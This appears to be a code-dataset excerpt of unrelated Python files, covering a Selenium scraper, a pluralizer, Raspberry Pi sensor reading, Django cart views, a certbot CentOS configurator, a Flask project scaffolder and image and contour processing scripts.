# make sure the path to the webdriver is right
# -------------
import time
from datetime import datetime
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import settings
import helpers
def get_driver_options():
"""
Returns default driver options
this function is used by the
get_driver_with_options function only.
"""
# Define Browser Options
chrome_options = Options()
chrome_options.add_argument("--headless") # Hides the browser window
chrome_options.add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'})
return chrome_options
def get_driver_with_options():
"""
Returns a driver object of the chrome
web driver. This can be used for crawling.
"""
#options = get_driver_options()
#return webdriver.Chrome(options=options)
return webdriver.Chrome()
def close_driver(driver):
"""
Closes the webcrawler object which is
passed to the function as argument.
Argument:
driver -- chrome webdriver object
"""
driver.close()
def click_button_xpath(driver, platform):
"""
Clicks the "show more" button when scrolling down the review page of a play store app
Tested yet with review pages only.
Argument:
driver -- the selenium driver holding the current session
"""
xpath = settings.platforms[platform]['search_listings']['show_more_xpath']
time.sleep(1)
show_more_button = driver.find_elements_by_xpath(xpath)[0]
driver.execute_script("arguments[0].click();", show_more_button)
def scroll_down_page(driver):
# Scroll down to the bottom.
driver.execute_script("window.scrollTo(0,document.body.scrollHeight);")
# Wait to load the page
time.sleep(1)
# Scroll down again if bottom changed.
driver.execute_script("window.scrollTo(0,document.body.scrollHeight);")
# Calculate new scroll height and compare with last height.
return driver.execute_script("return document.body.scrollHeight")
def is_date_reached(driver, platform):
search_by = settings.platforms[platform]['search_listings']['search_by']
search_query = settings.platforms[platform]['search_listings']['search_query']
element_positions = settings.platforms[platform]['search_listings']['element_positions']
date_format = settings.platforms[platform]['search_listings']['date_format']
reference_date = settings.platforms[platform]['search_listings']['reference_date']
reference_date = datetime.strptime(reference_date, '%Y-%m-%d')
date = None
if search_by == 'class':
elements = driver.find_elements_by_class_name(search_query)
else:
return None
if len(elements) >= 2:
for pos in element_positions:
try:
text = str(elements[pos].text).strip()
date = datetime.strptime(text, date_format)
break
except ValueError as e:
helpers.log('Can not generate date from {} and format {} at pos {}'.format(text, date_format, pos))
if not date:
raise ValueError('Can not generate any date')
if date <= reference_date:
return True
else:
return False
else:
raise LookupError('No elements found using {}'.format())
def scroll_down_till_limit(driver, platform):
"""
Scrolls down a webpage x_times times. Clicking button button when scrolled down if
specified.
Arguments:
driver -- chrome selenium driver of current session
x_times -- how many times the driver should scroll until the end of the page
button -- which button to click when scrolled down
Returns:
driver -- the webdriver at the final state
"""
# Scroll page to load whole content
last_height = 0
while True:
new_height = scroll_down_page(driver)
# if no more scrolling possible
if new_height == last_height:
break
# if specified point in past reached
if is_date_reached(driver, platform):
break
last_height = new_height
click_button_xpath(driver, platform)
return driver
|
15,973 | 2bc1a6147d59bd82d941c13bd47187618bac53ab | #Create list of exceptions
#sample from https://www.thoughtco.com/irregular-plural-nouns-in-english-1692634
#utimately, this should read a file
exceptionList = {
"addendum":"Addenda",
"aircraft":"Aircraft",
"alumna":"Alumnae",
"alumnus":"Alumni",
"analysis":"Analyses",
"antenna":"Antennae",
"antithesis":"antitheses",
"apex":"Apices",
"appendix":"Appendices",
"axis":"Axes",
"bacillus":"Bacilli",
"bacterium":"Bacteria",
"basis":"Bases",
"beau":"Beaux",
"bison":"Bison",
"bureau":"Bureaux",
"cactus":"Cacti",
"château":"Châteaux",
"child":"Children",
"codex":"Codices",
"concerto":"Concerti",
"corpus":"Corpora",
"crisis":"Crises",
"criterion":"Criteria",
"curriculum":"Curricula",
}
#List of last letters to be considered
considerLastLetter = ['s','h','x','z','o']
#List of consonants that are no problem in final position
noProblemConsonantsList = ['q','w','r','t','p','d','g','j','k','l','v','b','n','m']
#List of vowels. cf "case of the final "y"
vowelsList = ['e','u','i','o','a']
#grb user input
singWord = input("Enter a word in the singular: ")
if singWord in exceptionList.keys():
plurWord = exceptionList[singWord]
# words like "fix", "pass", "path"
elif singWord[-1] in considerLastLetter:
plurWord = singWord+'es'
# words like wolf
elif singWord[-1] == 'f':
plurWord = singWord[:len(singWord)-1]+'ves'
# words like "wife"
elif singWord[-2:] == 'fe':
plurWord = singWord[:len(singWord) - 2] + 'ves'
elif singWord[-1] == 'y' and singWord[-2] not in vowelsList:
plurWord = singWord[:len(singWord)-1]+'ies'
else:
plurWord = singWord + "s"
print(plurWord)
|
15,974 | 0da02ccb0148cd68dd11e931a6987b0069c08eba |
"""
Component which holds data about a sprite.
"""
class RenderComponent:
def __init__(self, sprite):
"""Sprite needs to be a pygame.image object."""
self.sprite = sprite
|
15,975 | 4b7a574904900d4fa2b703e683aa0da61418d900 | import RPi.GPIO as GPIO
import time
import board
import busio
import digitalio
import adafruit_bmp280
AO_pin = 0
SPICLK = 21
SPIMISO = 19
SPIMOSI = 20
SPICS = 8
def init():
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(SPIMOSI, GPIO.OUT)
GPIO.setup(SPIMISO, GPIO.IN)
GPIO.setup(SPICLK, GPIO.OUT)
GPIO.setup(SPICS, GPIO.OUT)
pass
def readadc(adcnum, clockpin, mosipin, misopin, cspin):
if ((adcnum > 7) or (adcnum < 0)):
return -1
GPIO.output(cspin, True)
GPIO.output(clockpin, False)
GPIO.output(cspin, False)
commandout = adcnum
commandout |= 0x18
commandout <<= 3
for i in range(5):
if (commandout & 0x80):
GPIO.output(mosipin, True)
else:
GPIO.output(mosipin, False)
commandout <<= 1
GPIO.output(clockpin, True)
GPIO.output(clockpin, False)
adcout = 0
for i in range(12):
GPIO.output(clockpin, True)
GPIO.output(clockpin, False)
adcout <<= 1
if (GPIO.input(misopin)):
adcout |= 0x1
GPIO.output(cspin, True)
adcout >>= 1
return adcout
def main():
init()
time.sleep(2)
while True:
spi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)
cs = digitalio.DigitalInOut(board.CE1)
sensor = adafruit_bmp280.Adafruit_BMP280_SPI(spi, cs)
ad_value = readadc(AO_pin, SPICLK, SPIMOSI, SPIMISO, SPICS)
voltage0=ad_value*(3.3/1024)*5
voltage=8.5+voltage0
print (" Voltage is: " + str("%.2f"%voltage)+"V")
print('Temperature: {} degrees C'.format(sensor.temperature))
print('Pressure: {}hPa'.format(sensor.pressure))
print('altitude: {}m'.format(sensor.altitude))
time.sleep(2)
if __name__ =='__main__':
try:
main()
except KeyboardInterrupt:
pass
|
15,976 | a76b352f72c8b715bf17cf678a4d0bd263b049ee | # def func():
# def func2():
# print('this is func2')
# return func2
#
#
# f = func()
# f()
#
# def f1(x):
# print(x)
# return 123
#
#
# def f2():
# ret = f1('s')
# print(ret)
#
#
# f2()
#
# def func():
# def func2():
# return 'a'
# return func2
#
# func2 = func()
# print(func2)
#闭包
#
# def func():
# x=20
# def inner():
# print(x)
# return inner
#
#
# he = func()
# he()
#
#输出的__closure__为None :不是闭包函数
# 输出的__closure__有cell元素 :是闭包函数
# def func():
# name = 'hanlei'
# def inner():
# print(name)
# print(inner.__closure__)
# return inner
#
# f = func()
# f()
#
# name = 'hanlei3'
# def func1():
# def inner1():
# print(name)
# print(inner1.__closure__)
# return inner1()
#
# f1 = func1()
#
from urllib.request import urlopen
def index(url):
def inner():
return urlopen(url).read()
return inner()
u = 'http://www.cnblogs.com/Eva-J/articles/7156261.html#_label1'
get = index(u)
print(get)
|
15,977 | 17acab7d4d2ccda31dc52af8d41788cf8f2dba58 | from django.shortcuts import (render, redirect, reverse,
HttpResponse, get_object_or_404)
from django.contrib import messages
from shop.models import Product
from django.contrib.auth.decorators import login_required
@login_required
def shopping_bag(request):
"""
Returns Shopping Bag
"""
return render(request, 'shopping_bag/shopping_bag.html')
def add_to_bag(request, item_id):
"""
Submit form to view
defines quantity of product added to shopping bag
"""
product = get_object_or_404(Product, pk=item_id)
# Get quantity of item and add to current bag
quantity = int(request.POST.get('quantity'))
redirect_url = request.POST.get('redirect_url')
# get products
select = None
if 'product_select' in request.POST:
select = request.POST['product_select']
current_bag = request.session.get('current_bag', {})
if item_id in list(current_bag.keys()):
# if item is currently in bag
if select in current_bag[item_id]['items_by_select'].keys():
# if item is same size/time, increment quantity
current_bag[item_id]['items_by_select'][select] += quantity
messages.success(
request,
f'{product.name} qty updated')
else:
# if item is different size/time, add new item
current_bag[item_id]['items_by_select'][select] = quantity
messages.success(request, f'Added {product.name} to bag')
else:
# if not currently in bag, add new item
current_bag[item_id] = {'items_by_select': {select: quantity}}
messages.success(request, f'Added {product.name} to bag')
# override session variable with update
request.session['current_bag'] = current_bag
return redirect(redirect_url)
@login_required
def update_bag(request, item_id):
"""
Submit update form to view to update shopping bag
"""
product = get_object_or_404(Product, pk=item_id)
# Get quantity of item and add to current bag
quantity = int(request.POST.get('quantity'))
# get products
select = None
if 'product_select_id' in request.POST:
select = request.POST['product_select_id']
current_bag = request.session.get('current_bag', {})
if quantity > 0:
current_bag[item_id]['items_by_select'][select] = quantity
messages.success(
request,
f'{product.name} qty updated')
# override session variable with update
request.session['current_bag'] = current_bag
return redirect(reverse('shopping_bag'))
@login_required
def remove_from_bag(request, item_id):
"""
Submit remove form to view to remove item from shopping bag
"""
try:
product = get_object_or_404(Product, pk=item_id)
# get products
select = None
if 'product_select' in request.POST:
select = request.POST['product_select']
current_bag = request.session.get('current_bag', {})
del current_bag[item_id]['items_by_select'][select]
if not current_bag[item_id]['items_by_select']:
current_bag.pop(item_id)
messages.success(request, f'{product.name} removed from bag')
request.session['current_bag'] = current_bag
return HttpResponse(status=200)
except Exception as e:
messages.error(request, f'Error removing item: {e}')
return HttpResponse(status=500)
|
15,978 | d283fe3b93bebb5bd27eb4e0d49ef6674e8aa664 | """ Distribution specific override class for CentOS family (RHEL, Fedora) """
import logging
from typing import Any
from certbot import errors
from certbot import util
from certbot_apache._internal import apache_util
from certbot_apache._internal import configurator
from certbot_apache._internal import parser
from certbot_apache._internal.configurator import OsOptions
logger = logging.getLogger(__name__)
class CentOSConfigurator(configurator.ApacheConfigurator):
"""CentOS specific ApacheConfigurator override class"""
OS_DEFAULTS = OsOptions(
server_root="/etc/httpd",
vhost_root="/etc/httpd/conf.d",
vhost_files="*.conf",
logs_root="/var/log/httpd",
ctl="apachectl",
apache_bin="httpd",
version_cmd=['apachectl', '-v'],
restart_cmd=['apachectl', 'graceful'],
restart_cmd_alt=['apachectl', 'restart'],
conftest_cmd=['apachectl', 'configtest'],
challenge_location="/etc/httpd/conf.d",
)
def config_test(self) -> None:
"""
Override config_test to mitigate configtest error in vanilla installation
of mod_ssl in Fedora. The error is caused by non-existent self-signed
certificates referenced by the configuration, that would be autogenerated
during the first (re)start of httpd.
"""
os_info = util.get_os_info()
fedora = os_info[0].lower() == "fedora"
try:
super().config_test()
except errors.MisconfigurationError:
if fedora:
self._try_restart_fedora()
else:
raise
def _rhel9_or_newer(self) -> bool:
os_name, os_version = util.get_os_info()
rhel_derived = os_name in [
"centos", "centos linux",
"cloudlinux",
"ol", "oracle",
"rhel", "redhatenterpriseserver", "red hat enterprise linux server",
"scientific", "scientific linux",
]
# It is important that the loose version comparison below is not made
# if the OS is not RHEL derived. See
# https://github.com/certbot/certbot/issues/9481.
if not rhel_derived:
return False
at_least_v9 = util.parse_loose_version(os_version) >= util.parse_loose_version('9')
return at_least_v9
def _override_cmds(self) -> None:
super()._override_cmds()
# As of RHEL 9, apachectl can't be passed flags like "-v" or "-t -D", so
# instead use options.bin (i.e. httpd) for version_cmd and the various
# get_X commands
if self._rhel9_or_newer():
if not self.options.bin:
raise ValueError("OS option apache_bin must be set for CentOS") # pragma: no cover
self.options.version_cmd[0] = self.options.bin
self.options.get_modules_cmd[0] = self.options.bin
self.options.get_includes_cmd[0] = self.options.bin
self.options.get_defines_cmd[0] = self.options.bin
if not self.options.restart_cmd_alt: # pragma: no cover
raise ValueError("OS option restart_cmd_alt must be set for CentOS.")
self.options.restart_cmd_alt[0] = self.options.ctl
def _try_restart_fedora(self) -> None:
"""
Tries to restart httpd using systemctl to generate the self signed key pair.
"""
try:
util.run_script(['systemctl', 'restart', 'httpd'])
except errors.SubprocessError as err:
raise errors.MisconfigurationError(str(err))
# Finish with actual config check to see if systemctl restart helped
super().config_test()
def get_parser(self) -> "CentOSParser":
"""Initializes the ApacheParser"""
return CentOSParser(
self.options.server_root, self, self.options.vhost_root, self.version)
class CentOSParser(parser.ApacheParser):
"""CentOS specific ApacheParser override class"""
def __init__(self, *args: Any, **kwargs: Any) -> None:
# CentOS specific configuration file for Apache
self.sysconfig_filep: str = "/etc/sysconfig/httpd"
super().__init__(*args, **kwargs)
def update_runtime_variables(self) -> None:
""" Override for update_runtime_variables for custom parsing """
# Opportunistic, works if SELinux not enforced
super().update_runtime_variables()
self.parse_sysconfig_var()
def parse_sysconfig_var(self) -> None:
""" Parses Apache CLI options from CentOS configuration file """
defines = apache_util.parse_define_file(self.sysconfig_filep, "OPTIONS")
for k, v in defines.items():
self.variables[k] = v
|
15,979 | 275fc40622a91046a4a613d830a43264d2a87f36 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import sys
import os
def print_help():
print('''[this py] <cmd>
cmd:命令名称,如:mvn node
示例:
[this py] mvn -> 打开mvn环境变量所在文件夹
''')
def open_path_in_explore(path):
os.system("explorer.exe \"{}\"".format(path))
def locate_file_in_explore(file):
os.system("explorer.exe /select, \"{}\"".format(file))
def print_no_newline(str):
sys.stdout.write(str)
sys.stdout.flush()
def read_a_num():
try:
cha = int(input())
return cha
except:
return -1
def open_file_by_num(files, num):
if 0 < num <= len(files):
# open_path_in_explore(os.path.dirname(files[num - 1]))
locate_file_in_explore(files[num - 1])
return True
print_no_newline('invalid num:')
return False
def handle(cmd):
cmd = "where \"{}\"".format(cmd)
try:
output = subprocess.check_output(cmd, shell=False, stderr=subprocess.STDOUT)
result = output.decode("GBK")
except Exception as e:
print(e.output.decode("GBK"))
return
if len(result) > 0:
files = result.split("\r\n")
files = [file for file in files if len(file) > 0]
if len(files) > 1:
print("select to open:")
print('\n'.join((str(index + 1) + '. ' + file) for (index, file) in enumerate(files)))
print_no_newline('enter num:')
while not open_file_by_num(files, read_a_num()):
pass
elif len(files) == 1:
open_file_by_num(files, 1)
if __name__ == '__main__':
args = sys.argv[1:]
if len(args) < 1:
print_help()
else:
handle(args[0])
|
15,980 | c88e012a342fe2c512d10f23f2c84e03202f91c6 | ###################################################################
#
###################################################################
import argparse
import os
class AppBuilder:
def __init__(self, name):
# supported features
self.sp_database = False
self.sp_logging = False # TODO: implement logging
self.sp_wtf = False
# directories path
self.path_for_root = os.path.join('.', name)
self.path_for_app = os.path.join(self.path_for_root, 'app')
self.path_for_cfg = os.path.join(self.path_for_root, 'config.py')
self.path_for_vws = os.path.join(self.path_for_app, 'views.py')
# create the root directory for the app
os.mkdir(self.path_for_root)
# add directory for temporary files (logs)
os.mkdir(os.path.join(self.path_for_root, 'tmp'))
# add actual app directories
os.mkdir(self.path_for_app)
os.mkdir(os.path.join(self.path_for_app, 'static'))
os.mkdir(os.path.join(self.path_for_app, 'templates'))
# add file to run app locally
with open(os.path.join(self.path_for_root, 'run.py'), 'w') as run_file:
run_file.write('from app import app\n')
run_file.write('\n')
run_file.write('app.run(debug = False)')
# add configuration file
with open(self.path_for_cfg, 'w') as cfg_file:
cfg_file.write('import os\n')
cfg_file.write('\n')
cfg_file.write('basedir = os.path.abspath(os.path.dirname(__file__))\n')
cfg_file.write('\n')
# add test set up file
with open(os.path.join(self.path_for_root, 'test.py'), 'w') as tst_file:
tst_file.write('import os\n')
tst_file.write('import unittest\n')
tst_file.write('from datetime import datetime, timedelta\n')
tst_file.write('from config import basedir\n')
tst_file.write('\n')
# add basic views file to complete
with open(self.path_for_vws, 'w') as view_file:
view_file.write('from flask import render_template, flash, redirect, url_for, session, request, g\n')
# add base html template
with open(os.path.join(self.path_for_app, 'templates/base.html'), 'w') as base_file:
base_file.write('<!DOCTYPE html>\n')
base_file.write('<html lang="en">\n')
base_file.write('\n')
base_file.write('\t<head>\n')
base_file.write('\t\t<meta charset="utf-8" />\n')
base_file.write('\t\t<meta http-equiv="X-UA-Compatible" content="IE=edge" />\n')
base_file.write('\t\t<!-- <meta name="viewport" content="width=device-width, initial-scale=1" /> for responsiveness -->\n')
base_file.write('\t\t<title>Place Title in Here</title>\n')
base_file.write('\t\t<!-- add a favicon from static directory (16x16px png) -->\n')
base_file.write('\t\t<!-- <link rel="shortcut icon" href="{}" /> -->\n'.format("{{ url_for('static', filename='favicon.ico') }}"))
base_file.write('\t\t<!-- links to css and javascript libraries to place below -->\n')
base_file.write('\t</head>\n')
base_file.write('\n')
base_file.write('\t<body>\n')
base_file.write('\t\t{% block content %}{% endblock %}\n')
base_file.write('\t</body>\n')
base_file.write('\n')
base_file.write('</html>\n')
def addFormSupport(self, fields = None, validators = None):
self.sp_wtf = True
with open(self.path_for_cfg, 'a') as cfg_file:
cfg_file.write('# Support for forms added:\n')
cfg_file.write('WTF_CSRF_ENABLED = True\n')
cfg_file.write('SECRET_KEY = "SOMETHING_HARD_TO_GUESS"\n')
cfg_file.write('\n')
with open(os.path.join(self.path_for_app, 'forms.py'), 'w') as form_file:
form_file.write('from flask_wtf import Form\n')
if fields is not None:
form_file.write('from wtforms import {}\n'.format(', '.join(fields)))
else:
form_file.write('from wtforms import *\n')
if validators is not None:
form_file.write('from wtforms.validators import {}\n'.format(', '.join(validators)))
else:
form_file.write('from wtforms.validators import *\n')
with open(self.path_for_vws, 'a') as view_file:
view_file.write('from .forms import *\n')
def addDatabaseSupport(self):
self.sp_database = True
with open(self.path_for_cfg, 'a') as cfg_file:
cfg_file.write('# Support for database added:\n')
cfg_file.write("SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')\n")
cfg_file.write("SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n")
cfg_file.write('\n')
with open(os.path.join(self.path_for_app, 'models.py'), 'w') as mod_file:
mod_file.write('from app import db\n')
mod_file.write('from app import app\n')
mod_file.write('import sys\n')
with open(self.path_for_vws, 'a') as view_file:
view_file.write('from .models import *\n')
# create db script:
with open(os.path.join(self.path_for_root, 'db_create.py'), 'w') as script_db:
script_db.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
script_db.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
script_db.write('\n\n')
script_db.write('from migrate.versioning import api\n')
script_db.write('from config import SQLALCHEMY_DATABASE_URI\n')
script_db.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
script_db.write('from app import db\n')
script_db.write('import os.path\n')
script_db.write('\n')
script_db.write('db.create_all()\n')
script_db.write('if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):\n')
script_db.write("\tapi.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')\n")
script_db.write('\tapi.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_db.write('else:\n')
script_db.write('\tapi.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, api.version(SQLALCHEMY_MIGRATE_REPO))\n')
with open(os.path.join(self.path_for_root, 'db_migrate.py'), 'w') as script_mg:
script_mg.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
script_mg.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
script_mg.write('\n\n')
script_mg.write('import imp\n')
script_mg.write('from migrate.versioning import api\n')
script_mg.write('from app import db\n')
script_mg.write('from config import SQLALCHEMY_DATABASE_URI\n')
script_mg.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
script_mg.write('\n')
script_mg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_mg.write("migration = SQLALCHEMY_MIGRATE_REPO + '/versions/{:03d}_migration.py'.format(v + 1)\n")
script_mg.write("tmp_module = imp.new_module('old_model')\n")
script_mg.write('old_model = api.create_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_mg.write('exec(old_model, tmp_module.__dict__)\n')
script_mg.write('script = api.make_update_script_for_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, tmp_module.meta, db.metadata)\n')
script_mg.write("open(migration, 'wt').write(script)\n")
script_mg.write('api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_mg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_mg.write('\n')
script_mg.write("print('New migration saved as {}'.format(migration))\n")
script_mg.write("print('Current database version: {}'.format(v))\n")
with open(os.path.join(self.path_for_root, 'db_downgrade.py'), 'w') as script_dg:
script_dg.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
script_dg.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
script_dg.write('\n\n')
script_dg.write('from migrate.versioning import api\n')
script_dg.write('from config import SQLALCHEMY_DATABASE_URI\n')
script_dg.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
script_dg.write('\n')
script_dg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_dg.write('api.downgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, v - 1)\n')
script_dg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_dg.write('\n')
script_dg.write("print('Current database version: {}'.format(v))\n")
with open(os.path.join(self.path_for_root, 'db_upgrade.py'), 'w') as script_ug:
script_ug.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
script_ug.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
script_ug.write('\n\n')
script_ug.write('from migrate.versioning import api\n')
script_ug.write('from config import SQLALCHEMY_DATABASE_URI\n')
script_ug.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
script_ug.write('\n')
script_ug.write('api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_ug.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
script_ug.write('\n')
script_ug.write("print('Current database version: {}'.format(v))\n")
def finalizeApp(self):
imp_l = ['views']
# Set the initialization script
with open(os.path.join(self.path_for_app, '__init__.py'), 'w') as init_script:
init_script.write('import os\n')
init_script.write('from flask import Flask\n')
if self.sp_database:
imp_l.append('models')
init_script.write('from flask_sqlalchemy import SQLAlchemy\n')
init_script.write('from config import basedir\n')
init_script.write('\n')
init_script.write('app = Flask(__name__)\n')
init_script.write("app.config.from_object('config')\n")
if self.sp_database:
init_script.write('db = SQLAlchemy(app)\n')
init_script.write('\n')
init_script.write('from app import {}\n'.format(', '.join(imp_l)))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Create Flask application arborescence')
parser.add_argument('name', type = str,
help = 'The name of the application; will set the name of the root directory.')
args = parser.parse_args()
FORM_FIELDS = ['StringField', 'TextAreaField']
FORM_VALIDATORS = ['DataRequired', 'Length']
builder = AppBuilder(args.name)
# Add support for various features here
builder.addFormSupport(FORM_FIELDS, FORM_VALIDATORS)
builder.addDatabaseSupport()
# Do not edit below this point
builder.finalizeApp() |
15,981 | 48c1e36918fe14e63fc2fe40169fc4fafdcb3709 | version https://git-lfs.github.com/spec/v1
oid sha256:f1ff30b52cb24bb73fb81207bf41852644551b23338fddd7b4f11e3f62dd4aaa
size 4518
|
15,982 | d05842be515ca5bbddbc4d1b263cde3e66cb7269 | """
Holds all classification functions
"""
#cv and math imports
import numpy as np
from matplotlib import pyplot as plt
import cv2
from math import radians, cos, sin, asin, sqrt,atan,atan2,degrees
#metadata, locations
import PIL.ExifTags
import PIL.Image
import utm #latqlong to utm-wgs84 transformations
#general libs
import pickle
import time
import os
import re
import sys
from pathlib import Path
#programs imports
import in_out as io
import constants as const
import utilmod as util
# def check_size (cont):
# return cont
# def check_shape (cont):
def kill_small_conts(contours,hierarchy,pxl_size):
"""
Deletes all contours smaller than a given size
Args:
contours: contours list
hierarchy: contours hierarchy list in opencv format
pxl_size: pixel size of the image
Returns:
tuple of (the big enough) contoures and matched hierarchy
"""
conts = []
hier = []
min_pxl_area = const.MIN_LEAF_AREA/pxl_size**2
for i,c in enumerate(contours):
if (cv2.contourArea(c) > min_pxl_area):
conts.append(c)
# hier.append(hierarchy[i])
return (conts,hier)
def kill_nested_in_big (contours,hierarchy,max_size = 120000):
"""
Deletes all contours that are big enough and their descendants.
Used to delete artificial contours.
Args:
contours: contours list
hierarchy: contours hierarchy list in opencv format
max_size: in pixels
Returns:
tuple of (the big enough) contoures and matched hierarchy,
and artificial contours
"""
ts = time.time()
del_indexes = []
conts = []
hier = []
art_conts = []
# find all sons
for i,c in enumerate(contours):
if((cv2.contourArea(c) > max_size)):
# and util.solidity (c) > const.MIN_ARTIFICIAL_SOLIDITY ):
art_conts.append(c)
# print ('tree list of {} '.format(i),hierarchy[i])
sons = util.tree_list(conts,hierarchy,i)
del_indexes.extend(sons)
# delete the sons
red_conts = [c for i, c in enumerate(contours) if i not in del_indexes]
red_hier = [h for i, h in enumerate(hierarchy) if i not in del_indexes]
te = time.time()
return (red_conts,red_hier,art_conts)
# def classify_conts (image,conts,hierarchy):
# c,h = kill_big_and_nested (contours,hierarchy)
# c,h = kill_small_conts (c,h)
##
# return c,h
def bare_soil(sil):
"""Returns True if the conture is of bare soil
"""
sil.get_color_params()
if ((sil.l_mean < 160) and (sil.a_std > 3)):
return False
else:
return True
def bare_soil_cont (c,im):
x,y,w,h = cv2.boundingRect(c)
stamp = np.copy (im [y:y+h,x:x+w])
lab_stamp = cv2.cvtColor(stamp, cv2.COLOR_BGR2Lab)
l_channel = lab_stamp[:,:,0]
a_channel = lab_stamp[:,:,1]
c = c - (x,y)
mask = np.zeros((h,w))
cv2.drawContours(mask,[c],0,255,-1)
# plt.imshow(mask),plt.show()
pts = np.where(mask == 255)
l_lst = l_channel[pts[0],pts[1]]
a_lst = a_channel[pts[0],pts[1]]
if ((np.mean(l_lst) < 160) and (np.std(a_lst) > 3)):
return False
else:
return True
def main_classifier (image,conts,hierarchy,pxl_size = -1):
"""
Classify all conts in an image, to artificial/bare-soil/targets
Args:
image: image object
conts: raw list of contours, as recived after filtering
hierarchy: hierarchy list in opencv format
pxl_size: pxl size of the image
Returns:
tuple holding the lists of the artificial/bare-soil/targets contours
"""
ts0 = time.time()
art_conts = []
bare_soil_conts = []
target_conts = []
del_indexes = []
t1 = time.time()
im = image #.get_image()
t2 = time.time()
artificial_pxl_size = const.MAX_ARTIFICIAL_TRUE_SIZE / (pxl_size**2)
te0 = time.time()
ts = time.time()
conts, hierarchy,art_conts = kill_nested_in_big (conts,hierarchy,artificial_pxl_size)
te = time.time()
conts, hierarchy = kill_small_conts(conts, hierarchy,pxl_size)
# print ('all conts',len(conts))
#delete the sons of artificial contours
for c in (conts):
if (bare_soil_cont(c,im)):
bare_soil_conts.append(c)
else:
target_conts.append(c)
# print ('art {} bare {} targets {}'.
# format(len(art_conts),len(bare_soil_conts),len(target_conts)))
return (art_conts, bare_soil_conts,target_conts)
|
15,983 | e4bf9bf609a4d78034441e53d9d7563d46952b79 |
import glob
import cv2
import os
path_relative = os.getcwd()
def processar(path_in, separator, path_out,res,ton):
if ton == 'rgb':
img = cv2.imread(path_in) # lê
img = cv2.resize(img, (res, res)) # redimensiona
nome_img = path_in.split(separator)[1]
cv2.imwrite(path_out + nome_img, img) # salva
if ton == 'cinza':
img = cv2.imread(path_in,0) # lê
img = cv2.resize(img, (res, res)) # redimensiona
nome_img = path_in.split(separator)[1]
cv2.imwrite(path_out + nome_img, img) # salva
def split_imagens(path, path_mask, separator, separator_mask):
print('processando mask')
lista_images = glob.glob(path)
# images
for i in lista_images:
print('IMAGES -> processando image > ', i)
processar(i, separator, path_relative + '/data/imagens/retina/400/cinza/', 400, 'cinza')
processar(i, separator, path_relative + '/data/imagens/retina/400/rgb/', 400, 'rgb')
processar(i, separator, path_relative + '/data/imagens/retina/800/cinza/', 800, 'cinza')
processar(i, separator, path_relative + '/data/imagens/retina/800/rgb/', 800, 'rgb')
# mask
lista_mask = glob.glob(path_mask)
for i in lista_mask:
print('MASK -> processando image > ', i)
processar(i, separator_mask, path_relative + '/data/imagens/mask/400/', 400, 'cinza')
processar(i, separator_mask, path_relative + '/data/imagens/mask/800/', 800, 'cinza')
def pre_process_image(path):
list_images = path
print("total = ", len(list_images))
for i in list_images:
name = i.split('/src/')[1]
if '-' in name:
"""save in /mask/"""
name_mask = name.split('-')[0]
name_mask = name_mask + str('_mask.png')
cv2.imwrite(path_relative + '/data/imagens/RIM-ONE/mask/' + name_mask, cv2.imread(i))
print('processada imagem ', name_mask)
else:
"""save in /image/"""
name_image = name.split('.')[0]
name_image = name_image + str('.png')
cv2.imwrite(path_relative + '/data/imagens/RIM-ONE/image/' + name_image, cv2.imread(i))
print('processada imagem ', name_image)
if __name__ == '__main__':
#pre_process_image(glob.glob(path_relative + '/data/imagens/RIM-ONE/src/*.bmp'))
split_imagens(path='/home/nig/PycharmProjects/Segmentation/data/imagens/RIM-ONE/image/*.png',
path_mask='/home/nig/PycharmProjects/Segmentation/data/imagens/RIM-ONE/mask/*.png',
separator='/image/',
separator_mask='/mask/') |
15,984 | 2ad23f5d24ea8582fd9c34880e3e32be8df1a6a9 | """
Routines for power spectra estimation and debiasing.
"""
import healpy as hp, numpy as np
from pspy import pspy_utils,so_mcm
from pixell import curvedsky
def get_spectra(alm1, alm2=None, spectra=None):
"""Get the power spectrum of alm1 and alm2, we use healpy.alm2cl for doing this.
